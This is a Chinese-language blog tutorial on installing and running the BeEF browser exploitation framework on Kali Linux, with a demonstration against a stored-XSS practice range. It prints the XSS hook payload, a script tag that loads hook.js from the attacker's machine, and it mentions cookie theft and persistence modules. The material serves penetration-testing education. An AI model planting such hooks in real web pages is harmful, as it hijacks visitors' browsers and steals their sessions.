xss-工具-Beef-Xss安装以及使用

Beef-Xss工具的简介

KaliLinux官网对这工具的介绍地址:https://www.kali.org/tools/beef-xss/
GitHub地址:https://github.com/beefproject/beef
Beef-Xss工具Wiki:https://github.com/beefproject/beef/wiki
xss-工具-Beef-Xss安装以及使用_第1张图片
BeEF 是浏览器开发框架的缩写,它是一款专注于网络浏览器的渗透测试工具
随着人们越来越担心针对客户端(包括移动客户端)的网络攻击,BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况,与其他安全框架不同,BeEF 超越了加固的网络边界和客户端系统,并在一扇敞开的门的上下文中检查可利用性:Web 浏览器
BeEF 将挂钩一个或多个 Web 浏览器,并将它们用作启动定向命令模块的滩头阵地,并从浏览器上下文中进一步攻击系统

安装Beef-Xss工具

这个工具最新的KaliLinux版本这个工具默认是不安装的,之前老版本的是自带的不管这么

apt-get install beef-xss

sudo apt-get install beef-xss

一路 y 就好,然后等待
如果出现下图,解决方法换地址源或者 apt update 重启之后在执行安装命令
在这里插入图片描述

启动Beef-Xss工具

beef-xss

第一次启动可能会提示这个,让你输入一个新的密码,输入回车即可(不会显示你输入的密码)下一次就不会让你输入了
在这里插入图片描述
它会自动打开浏览器 beef 控制台(账号默认:beef 密码(你第一次进入beef输入的))
xss-工具-Beef-Xss安装以及使用_第2张图片

关闭Beef-Xss

beef-xss-stop

xss-工具-Beef-Xss安装以及使用_第3张图片

Beef-Xss登录账户密码忘记解决方案:

安装之后在 /usr/share/beef-xss 目录下有一个 config.yaml 文件里面记录了密码账号:
xss-工具-Beef-Xss安装以及使用_第4张图片
用 vim 或者其它方式打开config.yaml 文件中 credentials: 下的 user是账号、passwd是密码,直接修改保存即可
xss-工具-Beef-Xss安装以及使用_第5张图片

启动Beef-Xss之后控制台会有一下信息

xss-工具-Beef-Xss安装以及使用_第6张图片

beef的xss代码格式:

<script src="http://:3000/hook.js"></script>

例子:比如我的KaliLinux的ip地址:192.168.56.129

<script src="http://192.168.56.129:3000/hook.js"></script>

beef控制台地址

http://127.0.0.1:3000/ui/panel
或者我的KaliLinux的ip地址:192.168.56.129 在宿主机浏览器输入:http://192.168.56.129:3000/ui/panel 都可以

Beef-Xss使用

xss-工具-Beef-Xss安装以及使用_第7张图片
我用pikachu靶场xss的存储型演示:
xss-工具-Beef-Xss安装以及使用_第8张图片
上面已经看到成功了,有时不一定怎么快展示等一会刷新一下
xss-工具-Beef-Xss安装以及使用_第9张图片
获取这些之后,具体可以实现上面功能在 commands 中查看
xss-工具-Beef-Xss安装以及使用_第10张图片

commands 模块中大概都是什么意思

我这里用就直接用谷歌翻译了
xss-工具-Beef-Xss安装以及使用_第11张图片
点击任意一个都有说明的比如播放声音模块
xss-工具-Beef-Xss安装以及使用_第12张图片

Browser(浏览器模块)

xss-工具-Beef-Xss安装以及使用_第13张图片
xss-工具-Beef-Xss安装以及使用_第14张图片

Chrome Extensions (Chrome 扩展)

xss-工具-Beef-Xss安装以及使用_第15张图片

Debug (调试)

xss-工具-Beef-Xss安装以及使用_第16张图片

Exploits(漏洞利用)

xss-工具-Beef-Xss安装以及使用_第17张图片
xss-工具-Beef-Xss安装以及使用_第18张图片
xss-工具-Beef-Xss安装以及使用_第19张图片

xss-工具-Beef-Xss安装以及使用_第20张图片
xss-工具-Beef-Xss安装以及使用_第21张图片

Host(主持人)

xss-工具-Beef-Xss安装以及使用_第22张图片

IPEC(国际环保提倡)

利用通信 (IPEC)进行的操作
xss-工具-Beef-Xss安装以及使用_第23张图片

Metasploit

在这里插入图片描述

Misc(杂项)

xss-工具-Beef-Xss安装以及使用_第24张图片

xss-工具-Beef-Xss安装以及使用_第25张图片

Network(网络)

在这里插入图片描述
xss-工具-Beef-Xss安装以及使用_第26张图片

Persistence(坚持)

xss-工具-Beef-Xss安装以及使用_第27张图片

Phonegap(电话间隙)

xss-工具-Beef-Xss安装以及使用_第28张图片

Social Engineering(社会工程)

xss-工具-Beef-Xss安装以及使用_第29张图片

简单的使用一个播放声音

是有一个 biu的一个声音

检测是否有 VLC

xss-工具-Beef-Xss安装以及使用_第30张图片

获取cookie

xss-工具-Beef-Xss安装以及使用_第31张图片

还有很多功能的这里就不一一演示了

你可能感兴趣的:(#,XSS跨站脚本,xss,beef,beef-xss,xss工具,beef安装)